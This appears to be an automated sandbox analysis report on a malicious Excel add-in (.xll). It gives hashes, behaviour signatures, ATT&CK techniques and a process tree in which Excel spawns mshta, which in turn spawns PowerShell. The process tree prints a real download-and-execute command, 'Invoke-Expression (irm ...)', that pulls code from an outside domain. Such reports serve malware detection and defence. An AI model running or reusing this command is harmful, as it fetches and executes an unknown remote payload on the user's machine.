Analysis

  • max time kernel
    101s
  • max time network
    124s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-05-2024 18:51

General

  • Target

    8f11b912d699cda82e12ca5820c83d10bf8ae6a36ff66b655e69904a4e1340de.xll

  • Size

    12KB

  • MD5

    49b910e7e7dd43416bbd14fa753dc2fc

  • SHA1

    3ebb75efd0a40c8400ef75408be2f1316c8eee37

  • SHA256

    8f11b912d699cda82e12ca5820c83d10bf8ae6a36ff66b655e69904a4e1340de

  • SHA512

    a445c3ae5c1827d858f6328d11c8ea8b2b34a7580c2dce383aff4addd0405e9b9a691bf2f0336cb982f895cf2d7d74b0562ab6411f9d30f91472ee3126d8e4e6

  • SSDEEP

    192:qL29RBzDzeobchBj8JON+ON/rucrEPEjr7Ahd:U29jnbcvYJOTxucvr7Cd

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\8f11b912d699cda82e12ca5820c83d10bf8ae6a36ff66b655e69904a4e1340de.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1176
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2312
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2696

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR1DMZ2N\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\8f11b912d699cda82e12ca5820c83d10bf8ae6a36ff66b655e69904a4e1340de.xll
    Filesize

    12KB

    MD5

    49b910e7e7dd43416bbd14fa753dc2fc

    SHA1

    3ebb75efd0a40c8400ef75408be2f1316c8eee37

    SHA256

    8f11b912d699cda82e12ca5820c83d10bf8ae6a36ff66b655e69904a4e1340de

    SHA512

    a445c3ae5c1827d858f6328d11c8ea8b2b34a7580c2dce383aff4addd0405e9b9a691bf2f0336cb982f895cf2d7d74b0562ab6411f9d30f91472ee3126d8e4e6

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k25mjbfh.54w.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1176-14-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-85-0x00007FFCFCFB0000-0x00007FFCFCFC0000-memory.dmp
    Filesize

    64KB

  • memory/1176-5-0x00007FFD3CFC3000-0x00007FFD3CFC4000-memory.dmp
    Filesize

    4KB

  • memory/1176-7-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-6-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-8-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-9-0x00007FFCFA800000-0x00007FFCFA810000-memory.dmp
    Filesize

    64KB

  • memory/1176-10-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-13-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-11-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-15-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-16-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-17-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-18-0x00007FFCFA800000-0x00007FFCFA810000-memory.dmp
    Filesize

    64KB

  • memory/1176-21-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-20-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-19-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-1-0x00007FFCFCFB0000-0x00007FFCFCFC0000-memory.dmp
    Filesize

    64KB

  • memory/1176-12-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-4-0x00007FFCFCFB0000-0x00007FFCFCFC0000-memory.dmp
    Filesize

    64KB

  • memory/1176-87-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/1176-3-0x00007FFCFCFB0000-0x00007FFCFCFC0000-memory.dmp
    Filesize

    64KB

  • memory/1176-86-0x00007FFCFCFB0000-0x00007FFCFCFC0000-memory.dmp
    Filesize

    64KB

  • memory/1176-84-0x00007FFCFCFB0000-0x00007FFCFCFC0000-memory.dmp
    Filesize

    64KB

  • memory/1176-83-0x00007FFCFCFB0000-0x00007FFCFCFC0000-memory.dmp
    Filesize

    64KB

  • memory/1176-0-0x00007FFCFCFB0000-0x00007FFCFCFC0000-memory.dmp
    Filesize

    64KB

  • memory/1176-2-0x00007FFCFCFB0000-0x00007FFCFCFC0000-memory.dmp
    Filesize

    64KB

  • memory/1176-67-0x00007FFD3CF20000-0x00007FFD3D129000-memory.dmp
    Filesize

    2.0MB

  • memory/2696-57-0x00000000067C0000-0x00000000067DE000-memory.dmp
    Filesize

    120KB

  • memory/2696-58-0x0000000006810000-0x000000000685C000-memory.dmp
    Filesize

    304KB

  • memory/2696-59-0x0000000007E00000-0x000000000847A000-memory.dmp
    Filesize

    6.5MB

  • memory/2696-60-0x0000000006D00000-0x0000000006D1A000-memory.dmp
    Filesize

    104KB

  • memory/2696-56-0x0000000006410000-0x0000000006767000-memory.dmp
    Filesize

    3.3MB

  • memory/2696-46-0x0000000005A00000-0x0000000005A66000-memory.dmp
    Filesize

    408KB

  • memory/2696-45-0x0000000005960000-0x0000000005982000-memory.dmp
    Filesize

    136KB

  • memory/2696-44-0x0000000005A90000-0x00000000060BA000-memory.dmp
    Filesize

    6.2MB

  • memory/2696-43-0x0000000003310000-0x0000000003346000-memory.dmp
    Filesize

    216KB

  • memory/2696-47-0x0000000006130000-0x0000000006196000-memory.dmp
    Filesize

    408KB